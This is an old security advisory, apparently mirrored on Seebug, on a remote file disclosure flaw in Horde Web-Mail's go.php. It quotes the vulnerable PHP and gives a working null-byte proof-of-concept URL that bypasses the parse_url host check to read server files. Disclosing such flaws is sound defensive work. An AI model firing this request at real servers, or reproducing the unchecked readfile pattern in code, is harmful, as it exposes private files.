----[ Horde Web-Mail Remote File Disclosure ... ITDefence.ru Antichat.ru ] Horde Web-Mail Remote File Disclosure Eugene Minaev underwater@itdefence.ru ___________________________________________________________________ ____/ __ __ _______________________ _______ _______________ \ \ \ / .\ / /_// // / \ \/ __ \ /__/ / / / /_// /\ / / / / /___/ \/ / / / / /\ / / / / / \/ / / / / /__ //\ \ / ____________/ / \/ __________// /__ // / /\\ \_______/ \________________/____/ 2007 /_//_/ // //\ \ \\ // // / .\ \\ -[ ITDEFENCE.ru Security advisory ]- // // / . . \_\\________[________________________________________]_________//_//_/ . . At first look , this code is not vulnerable and we can only read remote files. <?php if (empty($_GET['url'])) { exit; } if (get_magic_quotes_gpc()) { $url = @parse_url(stripslashes($_GET['url'])); } else { $url = @parse_url($_GET['url']); } ..... if ((!empty($_SERVER['SERVER_NAME']) && $_SERVER['SERVER_NAME'] == $url['host']) || (!empty($_SERVER['HTTP_HOST']) && $_SERVER['HTTP_HOST'] == $url['host'])) { ..... if (!empty($_GET['untrusted'])) { readfile($_GET['url']); exit; } ?> But parse_url is only a set of regular expressions and we can use nullbyte to deceive function. http://test1.ru/horde/util/go.php?untrusted=1&url=test.php%00http://another.host/ ----[ FROM RUSSIA WITH LOVE :: underWHAT?! , gemaglabin ]
※本站提供的任何内容、代码与服务仅供学习,请勿用于非法用途,否则后果自负
您的会员可兑换次数还剩: 次 本次兑换将消耗 1 次
续费请拨打客服热线,感谢您一直支持 Seebug!
匿名 兑换PoC
京公网安备 11010502034610号
暂无评论